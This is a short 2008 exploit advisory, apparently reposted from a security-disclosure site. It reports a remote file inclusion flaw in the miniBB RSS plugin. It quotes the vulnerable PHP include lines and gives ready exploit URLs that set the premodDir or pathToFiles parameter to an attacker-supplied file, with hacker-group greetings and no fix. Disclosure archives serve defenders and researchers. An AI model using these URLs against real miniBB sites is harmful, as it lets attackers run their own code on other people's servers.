plugin Rss Remote File Inclusion Vulnerability

2008.07.29
Credit: Ghost hacker
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################################## plugin Rss Remote File Inclusion Vulnerability Ghost Hacker, http://gh0st10.wordpress.com |, .-. .-. ,| | )(_o/ \o_)( | R-H team |/ /\ \| ################################################################################################## [~] Found by : Ghost Hacker [~] HomePage : real-hack.net [~] Email : Ghost-r00t_at_Hotmail.com [~] Name Script : plugin Rss [~] Download Script : http://www.minibb.com/download.php?file=minibb_plugin_rss ################################################################################################## [~] Error : include ($pathToFiles.'setup_mysql.php'); include ($pathToFiles.'bb_functions.php'); include($premodDir.'premoder_posts.php'); include($premodDir.'premoder_topics.php'); [~] Exploit : http://xxxx/rss.php?premodDir=EVIL http://xxxx/rss.php?pathToFiles=EVIL ################################################################################################## [~] Greetz : PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & L&J Team & Root Hacker .. Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope All Members Real Hack And All My Friends .. ################################################################################################## Found by : Ghost Hacker [ R-H TeaM ] ################################################################################################## hi str0ke HomePage plugin Rss http://www.minibb.com s33 y0u :) ,

References:

http://seclists.org/bugtraq/2008/Jul/0265.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top